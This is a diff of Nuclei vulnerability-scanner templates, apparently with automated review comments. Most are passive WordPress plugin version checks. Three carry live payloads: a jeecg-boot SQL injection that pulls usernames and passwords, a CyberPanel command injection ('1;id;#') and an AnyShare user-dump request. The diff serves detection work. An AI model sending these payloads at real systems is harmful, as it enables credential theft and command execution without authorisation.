--- /dev/null +++ b/poc/cve/CVE-2024-9835.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9835-38ca210b0204cafbf6f8c2b60a4a2cb6 + +info: + name: > + RSS Feed Widget <= 3.0.0 - Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] + author: topscoder + severity: medium + description: > + The RSS Feed Widget plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cbd6a4ee-49ea-4008-83ac-1a3c3ccdd4d4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9835 + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:CVE-2024-9835' + tags: cve,wordpress,wp-plugin,rss-feed-widget,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.0.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9836.yaml b/poc/cve/CVE-2024-9836.yaml new file mode 100644 index 0000000000..089b864a94 --- /dev/null +++ b/poc/cve/CVE-2024-9836.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9836-30a0c883d6baf4f6567157334592361c + +info: + name: > + RSS Feed Widget <= 2.9.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The RSS Feed Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rfw-youtube-videos' shortcode in all versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/da3b8de2-f620-40a7-a44a-c4fcb6d57d8c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9836 + metadata: + fofa-query: "wp-content/plugins/rss-feed-widget/" + google-query: inurl:"/wp-content/plugins/rss-feed-widget/" + shodan-query: 'vuln:CVE-2024-9836' + tags: cve,wordpress,wp-plugin,rss-feed-widget,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/rss-feed-widget/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "rss-feed-widget" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.9.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9934.yaml b/poc/cve/CVE-2024-9934.yaml new file mode 100644 index 0000000000..5e3f7d06fd --- /dev/null +++ b/poc/cve/CVE-2024-9934.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-9934-5ae7ef68155780d5697b9e643131dccb + +info: + name: > + Wp-ImageZoom <= 1.1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Wp-ImageZoom plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b4764fe2-7bdf-4b08-ae9f-ccb46929c50a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9934 + metadata: + fofa-query: "wp-content/plugins/wp-imagezoom/" + google-query: inurl:"/wp-content/plugins/wp-imagezoom/" + shodan-query: 'vuln:CVE-2024-9934' + tags: cve,wordpress,wp-plugin,wp-imagezoom,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-imagezoom/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-imagezoom" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.0') \ No newline at end of file diff --git a/poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml b/poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml new file mode 100644 index 0000000000..fb0e831cf5 --- /dev/null +++ b/poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml 
@@ -0,0 +1,23 @@
+id: jeecg-boot-getTotalData-sqli-CVE-2024-48307
+
+info:
+ name: jeecg-boot-getTotalData-sqli-CVE-2024-48307
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: app="JeecgBoot-企业级低代码平台" || body="/_app.config.js?v=3.7.1"
+
+http:
+ - raw:
+ - |-
+ POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200 && contains_all(body,"chartData") && contains_all(body,"concat(username") && contains_all(body,"yAxisIndex")
\ No newline at end of file
diff --git a/poc/detect/adbuddy-adblocker-detection.yaml b/poc/detect/adbuddy-adblocker-detection.yaml
new file mode 100644
index 0000000000..ef8c6f2261
--- /dev/null
+++ b/poc/detect/adbuddy-adblocker-detection.yaml
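Review bot: The `info` block of the jeecg-boot template has no `description`, `reference`, `classification` or `tags`, so a hit cannot be tied to an advisory or filtered by tag. The CVE appears only inside the `id` string. I would add `classification:` with `cve-id: CVE-2024-48307`, a `tags:` line, and rename `fofasearch` to the `fofa-query` key the other templates in this commit use. The cyberpanel-upgrademysqlstatus-rce and AnyShare-Usrm_GetAllUsers-infoleak templates have the same gap. Because the request reads the `username` and `password` columns of `sys_user`, every positive response stored by the scanner holds credential material, so results need to be handled as sensitive. A check that returns no secrets would be preferable for routine scanning.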
@@ -0,0 +1,59 @@ +id: adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d + +info: + name: > + adBuddy+ (AdBlocker Detection) by NetfunkDesign <= 1.1.3 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fd0a887-db61-4b2d-af52-ec1d9c525663?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/adbuddy-adblocker-detection/" + google-query: inurl:"/wp-content/plugins/adbuddy-adblocker-detection/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,adbuddy-adblocker-detection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/adbuddy-adblocker-detection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "adbuddy-adblocker-detection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.3') \ No newline at end of file diff --git a/poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml b/poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml new file mode 100644 index 0000000000..5396874e7a --- /dev/null +++ b/poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml 
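Review bot: `description`, `cvss-metrics`, `cvss-score` and `cve-id` are emitted with no value here, `shodan-query` is the bare prefix `'vuln:'`, and the template is still tagged `cve` although no CVE is assigned. Every template in this commit whose reference ends in `source=api-scan` repeats this, from this file through crafthemes-demo-import. Empty keys parse as null and give a triager nothing to act on, and the `cve` tag puts these results into CVE-filtered runs where they do not belong. Either fill the fields from the referenced Wordfence advisory, or have the generator omit the empty keys, the `shodan-query` line and the `cve` tag when no CVE exists.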
@@ -0,0 +1,59 @@ +id: ims-countdown-afc1b693115a4259c31be875ae4878db + +info: + name: > + IMS Countdown <= 1.3.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2de22728-4f67-406c-9db5-33cbba4c15eb?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ims-countdown/" + google-query: inurl:"/wp-content/plugins/ims-countdown/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ims-countdown,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ims-countdown/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ims-countdown" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.4') \ No newline at end of file diff --git a/poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml new file mode 100644 index 0000000000..9527fa8bbe --- /dev/null +++ b/poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml 
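Review bot: This WordPress plugin check is filed under `poc/microsoft/`, which looks like a keyword match on the slug rather than a statement about the product. The adbuddy-adblocker-detection template just before it lands in `poc/detect/` in the same way. Anyone selecting templates by directory will pull these into the wrong scan profile or miss them in a WordPress one. I would route every template whose path is `/wp-content/plugins/...` to a single WordPress directory before applying keyword-based sorting.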
@@ -0,0 +1,24 @@
+id: cyberpanel-upgrademysqlstatus-rce
+
+info:
+ name: cyberpanel-upgrademysqlstatus-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="CyberPanel"
+
+http:
+ - raw:
+ - |
+ GET /dataBases/upgrademysqlstatus HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+ Content-Type: application/json
+ Connection: close
+
+ {"statusfile":"1;id;#"}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=")
\ No newline at end of file
diff --git a/poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml b/poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml
new file mode 100644
index 0000000000..a196935599
--- /dev/null
+++ b/poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml
@@ -0,0 +1,21 @@
+id: AnyShare-Usrm_GetAllUsers-infoleak
+
+info:
+ name: AnyShare-Usrm_GetAllUsers-infoleak
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: app="AISHU-AnyShare"
+
+http:
+ - raw:
+ - |
+ POST /api/ShareMgnt/Usrm_GetAllUsers HTTP/1.1
+ Host: {{Hostname}}
+
+ [1,100]
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"password") && contains_all(body,"departmentNames")
\ No newline at end of file
diff --git a/poc/other/abcbiz-addons.yaml b/poc/other/abcbiz-addons.yaml
new file mode 100644
index 0000000000..ae65e436e6
--- /dev/null
+++ b/poc/other/abcbiz-addons.yaml
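Review bot: The cyberpanel-upgrademysqlstatus-rce template has no `tags` line, so nothing marks it as a check that runs a command on the scanned host and default scans cannot exclude it. I would add `tags: cyberpanel,rce,intrusive` and a `description` stating that the check is active, so operators can leave it out with a tag filter where only passive checks are authorised. The matcher is also loose, since `contains_all(body,"uid=")` and `contains_all(body,"gid=")` pass on any 200 page that contains both substrings. A regex matcher on the full `uid=<n>(...) gid=<n>(...)` shape would cut false positives.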
@@ -0,0 +1,59 @@ +id: abcbiz-addons-f574e93c5fcb8829799acb29890991b0 + +info: + name: > + ABCBiz Addons for Elementor <= 2.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/688c04b5-e5fe-4ddf-b253-2418149d9aba?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/abcbiz-addons/" + google-query: inurl:"/wp-content/plugins/abcbiz-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,abcbiz-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/abcbiz-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "abcbiz-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml b/poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml new file mode 100644 index 0000000000..90583c4e9e --- /dev/null +++ b/poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml 
@@ -0,0 +1,59 @@ +id: acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9fdc833-8384-42c0-ad9b-72e5b6351964?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file diff --git a/poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml b/poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml new file mode 100644 index 0000000000..9b295aae85 --- /dev/null +++ b/poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml 
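Review bot: `severity: low` is set on a finding named "Unauthenticated Privilege Escalation", with no CVSS data in `classification` to justify it. The next template covers the same plugin and version range (`<= 3.24.5`) and rates an unauthenticated stored XSS `high`. That suggests `low` is a generator fallback rather than an assessed rating, though the generator is not visible here. The same applies to bulk-role-change (Subscriber+ privilege escalation) and crafthemes-demo-import (arbitrary file upload), both also `low`. Take the rating and CVSS vector from the referenced Wordfence advisory, and fail generation instead of defaulting when the score is missing, because a `low` label will push these results below the triage threshold.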
@@ -0,0 +1,59 @@ +id: acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658 + +info: + name: > + Frontend Admin by DynamiApps <= 3.24.5 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a464f4-c357-446f-a5b8-0919d9af56c9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/acf-frontend-form-element/" + google-query: inurl:"/wp-content/plugins/acf-frontend-form-element/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,acf-frontend-form-element,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/acf-frontend-form-element/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "acf-frontend-form-element" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.24.5') \ No newline at end of file diff --git a/poc/other/aio-contact.yaml b/poc/other/aio-contact.yaml new file mode 100644 index 0000000000..de15d1548c --- /dev/null +++ b/poc/other/aio-contact.yaml 
@@ -0,0 +1,59 @@ +id: aio-contact-cdedb1c05262fbd14f43d1c46990cca3 + +info: + name: > + AIO Contact <= 2.8.1 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e4c7d179-9b65-48da-b92e-11fb0629653a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/aio-contact/" + google-query: inurl:"/wp-content/plugins/aio-contact/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,aio-contact,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/aio-contact/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "aio-contact" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.1') \ No newline at end of file diff --git a/poc/other/all-in-one-slider.yaml b/poc/other/all-in-one-slider.yaml new file mode 100644 index 0000000000..4067e93635 --- /dev/null +++ b/poc/other/all-in-one-slider.yaml 
@@ -0,0 +1,59 @@ +id: all-in-one-slider-14b7d4b703641121459b5014bbc6bd54 + +info: + name: > + All in One Slider <= 1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1371d1ea-a415-4cd8-bc99-a530670ffb94?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/all-in-one-slider/" + google-query: inurl:"/wp-content/plugins/all-in-one-slider/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,all-in-one-slider,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/other/alphabetical-list.yaml b/poc/other/alphabetical-list.yaml new file mode 100644 index 0000000000..5025cc1e3d --- /dev/null +++ b/poc/other/alphabetical-list.yaml 
@@ -0,0 +1,59 @@ +id: alphabetical-list-fcb529436e163b55fffdd5d732bd07fe + +info: + name: > + Alphabetical List <= 1.0.3 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2952a7bf-ccbf-46e0-ac7e-54576f413f66?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/alphabetical-list/" + google-query: inurl:"/wp-content/plugins/alphabetical-list/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,alphabetical-list,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/alphabetical-list/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "alphabetical-list" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.3') \ No newline at end of file diff --git a/poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml b/poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml new file mode 100644 index 0000000000..e0318ccec7 --- /dev/null +++ b/poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml 
@@ -0,0 +1,59 @@ +id: bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c + +info: + name: > + Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a028937-38bb-4c28-aaa1-60a86124c998?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bin-stripe-donation/" + google-query: inurl:"/wp-content/plugins/bin-stripe-donation/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bin-stripe-donation,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bin-stripe-donation" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file diff --git a/poc/other/blizzard-quotes.yaml b/poc/other/blizzard-quotes.yaml new file mode 100644 index 0000000000..fd8d20080d --- /dev/null +++ b/poc/other/blizzard-quotes.yaml 
@@ -0,0 +1,59 @@ +id: blizzard-quotes-bde5ee51c28fdec7059f71aa63b9d52f + +info: + name: > + Blizzard Quotes <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/06d4a12c-9503-4e89-85e7-64838a42dc28?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/blizzard-quotes/" + google-query: inurl:"/wp-content/plugins/blizzard-quotes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,blizzard-quotes,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/blizzard-quotes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "blizzard-quotes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3') \ No newline at end of file diff --git a/poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml b/poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml new file mode 100644 index 0000000000..6303aa5b49 --- /dev/null +++ b/poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml 
@@ -0,0 +1,59 @@ +id: bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3 + +info: + name: > + bodi0’s Easy Cache <= 0.8 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/bodi0s-easy-cache/" + google-query: inurl:"/wp-content/plugins/bodi0s-easy-cache/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,bodi0s-easy-cache,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bodi0s-easy-cache/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bodi0s-easy-cache" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8') \ No newline at end of file diff --git a/poc/other/booking-system-trafft.yaml b/poc/other/booking-system-trafft.yaml new file mode 100644 index 0000000000..7966bd4649 --- /dev/null +++ b/poc/other/booking-system-trafft.yaml 
@@ -0,0 +1,59 @@ +id: booking-system-trafft-5c6449fdf82d85068f035ee2f7c81477 + +info: + name: > + Booking System Trafft <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/84adbde0-9a9b-4a76-9333-56880fcc139d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/booking-system-trafft/" + google-query: inurl:"/wp-content/plugins/booking-system-trafft/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,booking-system-trafft,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/booking-system-trafft/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "booking-system-trafft" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml b/poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml new file mode 100644 index 0000000000..c357423da1 --- /dev/null +++ b/poc/other/buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6.yaml 
@@ -0,0 +1,59 @@ +id: buk-appointments-ae0876cbc8a6ea5bc63f81816ddd03a6 + +info: + name: > + Buk for WordPress <= 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1ebc34-d728-42b4-92b4-9e1a4ebd88b2?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/buk-appointments/" + google-query: inurl:"/wp-content/plugins/buk-appointments/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,buk-appointments,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/buk-appointments/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "buk-appointments" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 